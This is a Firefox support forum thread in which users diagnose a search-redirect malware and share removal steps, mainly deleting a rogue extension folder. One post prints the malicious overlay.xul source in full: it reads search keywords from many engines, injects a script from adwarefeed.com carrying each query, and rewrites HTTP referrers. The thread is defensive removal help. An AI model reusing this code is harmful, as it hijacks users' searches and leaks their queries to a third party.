"clickfeedmanager.com" virus targets Firefox

User Help for Mozilla Firefox
Tony Dragani
Guest

"clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

Hey guys,

There appears to be a new virus on the scene that targets Firefox users. It's a variation of the old "Google redirect"" virus that effects your search results, so that when you click on them it takes you to various ad sites. This variation effects both Google and Yahoo search results, and only seems to work in Firefox.

The redirects themselves take you through a site called "clickfraudmanager.com." The script that is doing this is coming from "adwarefeed.com." I've spent the better part of the weekend researching this, and it appears that this virus is really, really new, and has only been making the rounds for the past three or four days. At present, no antivirus or antimalware software is detecting it. If you do a search on this topic, you will see that no one in any of the computer support forums out there has been able to figure this out yet. You can, however, disable the redirecting by turning off Java or by installing the NoScripts Firefox addon, as I did. Of course, those measures don't treat the underlying problem.
User avatar
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

If you can isolate and save whatever is being installed, the vendors of the various Malware scanning programs would probably like to see it so that they can come up with a fix. Submission procedures vary, but most have specific rules for emailing it to them.

I agree, I started seeing an increase in postings here and at SUMO about something new last Thursday, but the initial reports started about 10 days ago, IIRC.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Tony Dragani
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

Hey Ed,

Thanks for the reply.

First off, I made a mistake in the title of this thread. The virus routes through "clickfraudmanager.com," not "clickfeedmanager.com." I was confusing it with "adwarefeed.com," which is where the script is coming from.

Anyway, I'm not sure how to isolate and save whatever is being installed. Honestly, I'm not sure what or where the file is that's doing this. I would really like to have something to send to the Malware scanning vendors. Any ideas?

Tony
User avatar
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

These are probably the best forums for malware removal help. They are where the "first responders" to threats hang out.
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
http://bleepingcomputer.com

Do a Google search for clickfraudmanager.com and you'll find threads already discussing removal of that.
http://www.bleepingcomputer.com/forums/topic201315.html

BTW, it might be risky for you to be a "first responder" without some specific guidance from your AV vendor. I wouldn't try it myself, but then again I don't seem to pickup much crap like that - hell I don't even use a Firewall, just rely upon my Linksys router to block that stuff, along with Avast! and Super AntiSpyware catching whatever the router allow through.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Tony Dragani
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

I stumbled across the solution:

It appears that the virus is hidden in the Firefox Folder. You must uninstall Firefox from the control panel, and then delete the Mozilla Firefox Folder off of your hard drive. Then download and reinstall Firefox. The problem is then gone.

To prevent this in the future, I recommend using the following two Firefox Addons: WOT (web of trust) and NoScript. These two addons will effectively stop any more viruses from being installed via the Firefox browser.
User avatar
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?

There has to be a less destructive method of removing that virus.



Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
User avatar
GudgeonPin
Posts: 410
Joined: March 8th, 2008, 4:10 pm

Re: "clickfeedmanager.com" virus targets Firefox

Post by GudgeonPin »

the-edmeister wrote:Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?
There has to be a less destructive method of removing that virus.


I have to agree Ed. If the problem is not a stand alone .EXE but is now attached to an existing FF3 .EXE or .DLL or something, would a reinstall of FF3 on top of the existing one preserve all of the underlying settings and overwrite old files killing the attached code?
Cary G.
User avatar
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

I get a little frustrated trying to help users figure this stuff out because I don't seem to ever get this crap dumped on my PC and then have the opportunity to have to figure out how to fix it. I guess that's how Mac and Linux users feel, too.


.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
User avatar
Thedeadjester
Posts: 1
Joined: February 9th, 2009, 8:31 pm

Re: "clickfeedmanager.com" virus targets Firefox

Post by Thedeadjester »

I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:
"Don't thank me... just pay it forward"
Rookie_MIB
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Rookie_MIB »

Did some more digging through this and found out that the problem is contained in a file called 'overlay.xul'

In it, it runs a stupid little redirection script which not only 'overlays' a clickmanager type link for google and yahoo, but ask, altavista,
and just about every other search engine out there. You can just delete the 'overlay.xul' file (or that directory contained in your
'program_files/mozilla/firefox/extentions/{xxxxxxxxxx}/chrome/content/') which has that overlay file.

So to recap:
1) shut down firefox.
2) go to the 'program files/mozilla/firefox/extentions' directory
3) delete the directory which has the overlay.xul file (or was created when you noticed the redirection)
4) restart the browser

Nasty little thing - what a pain in the arse, but it's pretty simple. Just frustrating.
Guest
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Guest »

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:

IT seems to have worked. I've been killing myself since last Thursday trying to get rid of this thing. I tried every antispyware, antimalware, antivirus and registry cleaner imaginable. Your solution was the simplest and only one to be effective. YOU ARE THE MAN!!!!!!!
User avatar
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Now that is a good solution! A very reasoned, diagnostic type approach to "removing the pimple", instead of amputating the limb!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process.
My thoughts on that matter.
Pron is so readily available that losing a few links might be a good thing, you just look for more and you might find a new favorite pron TGP site.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Frank Azle
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Frank Azle »

I don't think the Overlay.xul is necessarily the problem because in other add-ons it is there. (I have it in as Morning Coffee and yetanothersmoothscrolling). However, the suggestion to delete that new folder worked so much thanks!!!
brian_o
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by brian_o »

If you look at the code inside overlay.xul, you'll see that it's designed to do the exact thing you're complaining about (i.e. redirect searches to other sites). Overlay.xul IS the problem, remove it.
But, make sure you're deleting the correct overlay.xul.
Here are the contents of my (viral) one:


<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&amp;rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>
guest1976
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by guest1976 »

That helped thanks.
Locked